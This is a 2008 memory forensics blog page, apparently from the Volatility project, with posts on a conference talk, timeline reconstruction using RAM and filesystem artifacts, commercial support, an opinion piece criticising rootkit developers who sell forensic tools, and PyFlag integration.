Join with industry leaders to discuss the latest advancements in memory forensics and the importance of open source initiatives. This is your opportunity to help shape the future of memory forensics!

Invited speakers and panelists include:
  • Dr. Brian Carrier (Basis Technology)

  • Eoghan Casey (Stroz Friedberg, LLC)

  • Dr. Michael Cohen (Australian Federal Police)

  • Brian Dykstra (Jones Dykstra & Associates)

  • Brendan Dolan-Gavitt (Georgia Institute of Technology)

  • Matthew Geiger (CERT)

  • Keith Jones (Jones Dykstra & Associates)

  • Jesse Kornblum (ManTech)

  • Andreas Schuster (Deutsche Telekom AG)

  • AAron Walters (Volatile Systems, LLC)

  • More to be announced......

Brought to you by the Volatility Team: Open Source Memory Forensics.

Saturday, March 15, 2008

Using Hashing to Improve Volatile Memory Forensic Analysis


I wanted take this opportunity to thank everyone who attended our presentation, "Using Hashing to Improve Volatile Memory Forensic Analysis", at the American Academy of Forensic Sciences 60th Annual Meeting on February 21, 2008 Washington, D.C.. This was joint work with my colleague Blake Matheny and Doug White from the National Institute of Standards and Technology, NIST. The American Academy of Forensic Sciences does a lot of great work furthering the application of science and law. I'm glad to see their renewed interest in the area of digital forensic sciences. In particular, I was encouraged that our peers in the forensic sciences community were able recognize the importance of volatile memory analysis to the future of digital investigations. I believe this is an extremely important step!

I also wanted to take this opportunity to thank our friends at NIST, especially Doug White and John Tebbutt, for all their help with this research. With their help, we are creating a standard reference data set to support the needs of the growing community of volatile memory analysts. A special thanks also goes to Jide for all his help and thoughtful discussions!

The slides from the AAFS presentation are now available.

Saturday, February 2, 2008

It's about time...

As we mentioned in a previous blog post and in our presentations, we have recently been focusing our attention on the Reconstruction Phase of the digital investigation process. During the Reconstruction Phase, a digital investigator will attempt to organize the analysis results to help develop a theory about what happened during an incident. One method investigators have traditionally used to organize file system analysis is to elucidate the temporal relationships between digital artifacts. This technique is referred to as temporal reconstruction.

Dan Farmer demonstrated the usefulness of temporal reconstruction of filesystem events with the 'mactime' program. In fact, he called mactime "the most potentially valuable forensic tool in your digital detective toolkit" (Farmer, 2000). Rob Lee eventually extended this work with the 'mac_daddy' program and finally these tools were combined by Brian Carrier into the SleuthKit's versions of 'mactime' and 'mac-robber'. Recently, Florian Buchholz has also done a lot of interesting research exploring the characteristics of these temporal relationships and demonstrating the value of being able to combine disparate data sources, Zeitline.

In this blog entry, we will demonstrate how digital artifacts extracted from volatile memory analysis can be combined with artifacts from file system analysis to help reconstruct a more complete understanding of the digital crime scene. In fact, volatile memory analysis often provides the context necessary to link seemingly disparate events and their related artifacts, in ways that are not possible with typical live response tools. Using these temporal relationships, we have also been able to develop "temporal incident patterns" allowing us to quickly discern tools and techniques that may have been involved in an incident based on their "temporal footprints". We have also found that the ability to visualize these temporal relationships is invaluable for both presentation and knowledge discovery.

The following images will help demonstrate how a digital investigator can use both volatile memory analysis and visualization to improve temporal reconstructions of the digital crime scene. The file system events used to populate the time line in the images were generated using the Sleuthkit's 'mactime' program. These instantaneous events are represented in the image with blue dots and relate to the time attributes (LastWriteTime, LastAccessTime, CreationTime, etc) associated with files and directories in a file system, MACtimes. The following image is a visual time line representation of a filtered set of file system events.



In the next image, we augment the time line with events extracted using live response techniques, one type of run time state analysis. Live response allows us to extract events about objects that were active on the system when acquisition was performed. This could be extracted with your typical live response toolkit (RAPIER, WFT,etc). The red dots in this image are used to denote when a process was created. Unlike the file system events, this is a duration event since it has both a start time and an end time. In this image, the end time relates to when the live response was performed, represented by the gray dot. The green dot, another instantaneous event, represent when a process binds a specific port address to its socket. This augmented time line can be seen in the following image.






The final image demonstrates how using volatile memory (RAM) analysis to perform run time state analysis can be used to further augment our temporal reconstruction of the digital crime scene. In this case, the temporal events were extracted from volatile memory using Volatility. In contrast to the previous image, we are not only able to augment the time line with those objects that where active when live response was performed but also with objects that may have been relinquished by the operating system. The blue dots in the image once again represent file system events. The red dots represent process creation events, except this time a process duration event ends with memory acquisition or when a process exited. The green dots relate to binding sockets and the grey dot relates when memory acquisition was performed. The final augmented time line can be seen in the following image.





The purpose of this blog entry was to demonstrate the usefulness of being able to augment temporal reconstruction with both visualization and volatile memory analysis. In the final image, we can easily see how including volatile memory analysis and visualization allow us exploit temporal locality and volatile context to develop theories about the incident. We have found this to be invaluable during the reconstruction phase of the digital investigations process.


Despite the usefulness of these techniques, it is important to keep in mind that timestamps can be manipulated by a determined adversary and recently tools, such as timestomp, have been created to frustrate temporal reconstructions of filesystems. Recent research has also discussed important considerations for the digital investigator as they work with temporal data. Temporal reconstruction is not the panacea but a digital investigator should combine many types of analysis techniques during their digital investigations.

More details to follow ...

Thursday, January 31, 2008

Commercial Support for Volatility!

While at DoD Cyber Crime last week, numerous members of the Volatility community made me aware of a company attempting to spread misinformation about Volatility. It was broadly suggested that there was no support being offered for Volatility. The goal behind the open development of Volatility was to bring together systems researchers who believed in bettering the state of the digital forensics community. One way that we have been able to continue this open development is by offering customizations and support.

Volatile Systems, LLC has been providing commercial support and maintenance for Volatility (and our other products) for the past 8 months. In fact, one of the main reasons Volatile Systems, LLC formed was to support the forensics needs of our users who required commercial support contracts. The added benefit of our commercial support contracts is that you are not only getting guaranteed support and access to our team of unparalleled memory analysts, but you are also actively contributing back to the volatile memory analysis community by allowing us to continue the open development of Volatility.

At this point, we also decided to extend a new offer to those who may be considering spending the thousands of dollars to purchase one of those other commercial products, as they become available. If you are considering investing in one of those products because you think it provides extraction functionality not currently supported in Volatility, contact us and let us know! In most cases, we would be more than willing to use those funds to build you custom modules providing the same capabilities you desire but tailored to your exact needs. In addition, we would provide you access to the source code, training on how to use the modules, and share information on how they were developed. As we have learned from our experience performing volatile memory analysis, the most valuable thing is often not the tool but the experience and training of the analyst. Knowledge is power!

On a tangential note, it was encouraging to get all the positive feedback about Volatility at the conference. We are committed to this growing open community of volatile memory analysts and we are highly appreciative of their support. I also wanted to extend a special thanks to the Volatility community for keeping me updated on this evolving issue. Little do they know, the Order of Volatility is everywhere!

Sunday, January 20, 2008

They are playing you for a fool!

I have previously talked about this issue before, but based on a number of conversations I had last week at Cyber Crime, I felt it was worth bringing up again. Every time this issue comes up, it reminds me of one of my favorite blog posts, which talks about the ethical conflict in the rootkit community. I also recently came across this blog post from my former advisor, Spaf, which I found relevant as well.

One of the main reason why I dedicated myself to researching volatile memory analysis was the fact that the offensive communities and projects were flourishing. As a result, the sophistication of methods and accessibility to knowledge was continuing to grow unabated in the offensive community. At the time, I felt we drastically needed to have a similar revolution in the defensive community. A way of bringing together strong systems researchers who were interested in securing our infrastructure.

Based on the research we were doing at the time, I knew that volatile memory analysis would be an important component of securing those systems and had the potential to disrupt much of the offensive research being performed. As a result, members of our project have spent a great deal of time over the last couple of years writing research papers, giving talks, educating, and developing an open source architecture, in order to inspire research and increase the communal knowledge of the investigative community. In the process, we have had over 20 different contributors from multiple countries across the world. This includes contributions from numerous law enforcement and forensic agencies. In fact, I have been contacted by many universities that are now, or soon will be, using Volatility in their digital forensic courses.

It seems that the work being done in the live memory analysis community has also been successful at getting the attention of the offensive community (esp. rootkit). In fact, they have attempted many times in the last couple of years to disrupt the communal aspects of these projects. They began by trying to convince people that volatile memory analysis wouldn't work and was ineffective. Their methods changed last year, when they began trying to deceptively patent techniques that members of the volatile memory analysis community had already presented at conferences. Recently, I have learned that they are now trying to use their companies as real life Trojan horses to undermine and divide the open nature of the volatile memory analysis community. They are now trying to sell the techniques they had previously argued were ineffective. Once again, trying to capitalize on the problem they created.

Let's consider the following analogy:

Sadly, your child has been struggling with drug addiction for a number of years. He was recently busted by the police and mandated by the court to attend drug rehabilitation. Your child's drug dealer was a notorious individual by the name of B.S. Hary. B.S. Hary has never hidden the fact that he sells drugs and, in fact, even wrote a book and teaches classes about advanced drug dealing techniques. Often flaunting his drug dealing in the face of local law enforcement, who are overburdened dealing with the myriad of drug dealing pupils B.S has released on the streets. As a result, B.S. Hary's drugs and drug dealing techniques account for the majority of the drug problem currently faced by your community.

Recently, B.S. became concerned about the popularity of drug rehabilitation in pop culture. On the one hand, he realized that rehabilitation could be bad for business, but he also figured there was a lot money to be made in rehabilitation. As a result, he decided that he could not sit idly by and watch his drug business be swept out from under him, so he formulated a plan. He decided to capitalize on the rehabilitation market while undermining its effectiveness by starting his own rehabilitation company called Addiction Responder. B.S. Hary even had the brazenness to open Addiction Responder right next door to his crack house.


B.S. Hary is hoping to play the community for a fool!

As a parent, would you be willing to send your child to the Addiction Responder clinic? Knowing that Addiction Responder is run by a notorious drug dealer, do you think the court would be willing to trust a report that acknowledges your child's successful completion of its drug rehabilitation program? Knowing that the owner of Addiction Responder has a crack house right next door to the clinic, do you think the court would have faith in the fidelity of Addiction Responder's rehabilitation capabilities? Knowing that B.S. sells manufactured drugs out of the crack house right next door, would you be willing to ingest his magic rehabilitation pills? Knowing that the money you give to Addiction Responder for rehabilitation will be used to further his drug cartel, will you be willing to help fund the problem that is tormenting both your family and your community?

Your child's current drug dealer wants to perform his rehab.
You said, no, no, no!


On that note, it seems utterly absurd to me that anyone would consider buying volatile memory (RAM) forensics tools from an organization that freely admits to having armed and which continues to arm the enemy with "technology being used to evade forensics and response today." As a taxpayer, I'm not happy to see that all the government funding they have received for research and development has contributed to the majority of the rootkits currently found on the Internet today. As a person involved in forensic investigations, I would not want to be the person responsible for presenting those tools or results in court.

Defense Attorney: Is it true that developers of this "investigation" tool are responsible for the techniques found in the majority of rootkits found on the Internet today?
Forensic Examiner: Yes.
Defense Attorney: Is it true that the makers of this tool also sell "undetectable" software agents that allows people to secretly spy on a person/companies computers (similar to malware or spyware)?
Forensic Examiner: Yes.
Defense Attorney: Do the developers of this software also develop tools to exploit software, cheat at online games, and build rootkits?
Forensic Examiner: Yes.


One of the most important things that I have learned from the forensics and digital investigation communities is that the integrity and trust that can be placed in the collected evidence is often the most important standard. I have been confronted with many situations where we have had to forgo certain types of evidence, because it had the potential to compromise the integrity of investigation and/or case. How would you like to walk into court knowing that the evidence you collected and analyzed will immediately be called into question and, as a result, ruin the case? What happens when the malware you are investigating, as part of an incident, was written by the same people who wrote your forensic tool? Can you trust that they weren't involved?

The question is, are you willing to listen to B.S. and be played the fool?

And you wonder why I'm angry.....

Friday, January 4, 2008

PyFlag Using the Volatility Framework!

It was only a matter of time....

In case you might have missed it during the holidays, the latest version of PyFlag now leverages the Volatility Framework to add volatile memory analysis (RAM Forensics) to it's outstanding list of capabilities. As a result, making PyFlag the first and only tool publically available that allows the digital investigator to correlate disk images, log files, network traffic, and RAM captures all within an intuitive interface. While the current functionality is still preliminary, just imagine the possibilities!

Since PyFlag loads memory images through its standard IO source interface, it is also now possible to store your memory images using the EWF format, commonly used in commercial tools. Once the memory image is uploaded to PyFlag, information can either be accessed through a browseable /proc interface or through the Stats view. Michael Cohen and his team have provided a tutorial and image to get you started.






As I mentioned in a previous post, a special thanks to Europol for bringing our teams together through the High Tech Crime Expert Meeting. I also want to thank Michael Cohen for the great work he has done with PyFlag and his contributions to Volatility! Stay tuned for further exciting collaborations and future Volatility releases in 2008!